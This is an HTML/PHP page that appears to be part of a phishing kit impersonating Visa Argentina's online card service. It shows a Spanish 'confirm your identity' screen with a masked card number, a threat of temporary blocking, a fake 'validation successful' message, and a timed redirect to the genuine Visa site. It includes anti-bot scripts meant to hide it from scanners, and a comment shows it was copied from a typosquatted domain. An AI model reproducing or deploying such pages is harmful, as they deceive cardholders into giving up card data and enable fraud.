<!DOCTYPE html>
<html>
<?php


include 'antibots.php';
include 'bots.php';

session_start();

?>
<body style="overflow-y:hidden">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>https://inetserv.visa.com.ar/</title>
<meta http-equiv="Refresh" content="5;url=https://inetserv.visa.com.ar/visahome/">
<link href="files/style.css" rel="stylesheet" type="text/css">
<link href="files/menu.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center" class="inicio"> 
<table width="960" border="0" cellpadding="0" cellspacing="0">
  <tbody>
    <tr>
      <td width="626" align="left" valign="top"> <div style="padding-left: 22px;" class="home"> <div style="border-left: 1px solid #fff; height: 20px; padding-top: 5px; padding-left: 5px; text-decoration:;"> INICIO </div></div></td>
      <td width="334" align="right"><div class="home2"><div style="float:right; padding-top: 9px;"><img src="files/arro.jpg" width="10" height="5" alt=""/></div>
      <div style="float:right; border-right: 1px solid #fff; height: 20px; padding-top: 5px; padding-right: 5px; font-weight:700; font-size:12px; ">  </div>
      </div></td>
    </tr>
  </tbody>
</table>

</div>

<div align="center" class="inicio2">
	<div style="width: 960px; margin-top: 19px; height: 86px;">
		<div style="float:left; margin-right: 10px;"><img src="files/logo.jpg" width="365" height="63" alt=""/></div>
    	<div style="text-align:right; float:left; margin-left: 140px;"><h2 style="color: #71777f; font-size: 11px;font-weight: 600;padding: 5px; font-family: 'Lucida Grande','Lucida Sans Unicode',Arial,Tahoma,sans-serif;">TARJETA N&deg;: XXXX XXXX XXXX XXXX <span style="color: #0224a0;">  |  CONFIRMANDO </span><br />
    	<span style="color: #fba407;">  </span> (Titular)<br /> <div class="select-card selected">Seleccione otra tarjeta</div> </h2></div>
    	<div style="float:right; margin-top: 5px;"><img src="files/v.jpg" width="" height="" alt=""/></div>
   	</div>
</div>

<div class="container-12">
<div class="menu">
            <ul>
                    <li  class="lic first grid-3 inactive"><span class="label">CONSULTAR</span>
                    </li><a  href="#" style="display:none"  class="mVac_1"> </a>
                    <li  class="lic delMedio grid-3 inactive" ><span class="label">PAGAR</span>
                    </li><a  href="#" style="display:none"  class="mVac_40"> </a>
                    <li  class="lic delMedio grid-3 inactive" ><span class="label">FINANCIAR (Plan V)</span>
                    </li><a  href="#" style="display:none"  class="mVac_60"> </a>
                    <li  class="lic last grid-3 inactive" ><span class="label">+ SERVICIOS</span>
                    </li><a  href="#" style="display:none"  class="mVac_20"> </a>
            </ul>
</div>
</div>

<div style="width: 100%; background:url(files/fondo.jpg) repeat-x; margin-top: 2px;">
    <div class="content container-12">
    <h1><img src="files/deco.jpg" width="14" height="13" alt=""/> CONFIRMACI&Oacute;N</h1> 
<center>
<div align="left" style="padding-left: 10px; margin-top: 40px; padding-top: 20px; margin-bottom: 20px; font-style: italic;
  font-weight: 400; border-top: 1px solid #ccc; font-family: Arial; font-size: 13px; color: #71777f;">Ingrese los datos solicitados para confirmar su <span>ide</span>ntidad. </div>    
</center> 
         
      
<div id="nCuenta" style="display: none;">
<div class="cuadro" >
<br />
<div style="padding-left: 10px; padding-right: 10px;">
<div>
<div class="fondo">
    <div style="float: left; margin-left: 20px; margin-top: 5px;"> De no responder correctamente se procedera a un bloqueo temporal.<br>
    </div>
	</div>
</div>
</div>
<br /><br />
<div style="background: none repeat scroll 0 0 #cecece;float: left;height: 26px;width: 100%; text-align: center;">
<a href="loadingwindowId%3ddb5.html" style="background: none repeat scroll 0 0 #ff9e01;border: 0 solid #ff9e01;border-radius: 3px;color: #fff;
cursor: pointer;font-size: 11px;font-weight: 700;margin: 3px;min-width: 94px;padding: 3px 10px;text-align: center;text-transform: uppercase;">Continuar</a>
</div>
<br />

</div>
</div>

<table width="960" border="0">
  <tbody>
    <tr>
      <td align="left" width="490"><img src="files/landing_banner_left.gif" width="462" height="113" alt=""/></td>
      <td align="right" width="460"><img src="files/landing_banner_right.gif" width="462" height="113" alt=""/></td>
    </tr>
  </tbody>
</table>


    </div>
</div>

<div id="footer">
<table width="100%" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td width="33%" style=" background:url(files/footer.gif) repeat-x;">&nbsp;</td>
    <td width="33%"><img src="files/foot.jpg" width="977" height="45"></td>
    <td width="33%" style=" background:url(files/footer.gif) repeat-x;">&nbsp;</td>
  </tr>
</table>
</div>
<div class="proceso">
<br />
<div style="padding-left: 10px; padding-right: 10px;">
<CENTER>
<br />
<h2 style="color: #e89100;text-transform: uppercase; font-size: 13px;font-weight: 600;padding: 5px; font-family: 'Lucida Grande','Lucida Sans Unicode',Arial,Tahoma,sans-serif;">PROCESANDO</h2>
<img src="files/busy.gif" width="220" height="19"><br />
<h2 style="color: #e89100;text-transform: uppercase; font-size: 13px;font-weight: 600;padding: 5px; font-family: 'Lucida Grande','Lucida Sans Unicode',Arial,Tahoma,sans-serif;">VALIDACI&Oacute;N EXITOSA</h2>
<br />
</CENTER>
</div>
</div>
<div class="sombre"></div>
</body>

<!-- Mirrored from vlsa-conm-ar.info/vlsahonne/loadingwindowId=db3.php by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 29 Apr 2015 18:21:21 GMT -->
</html>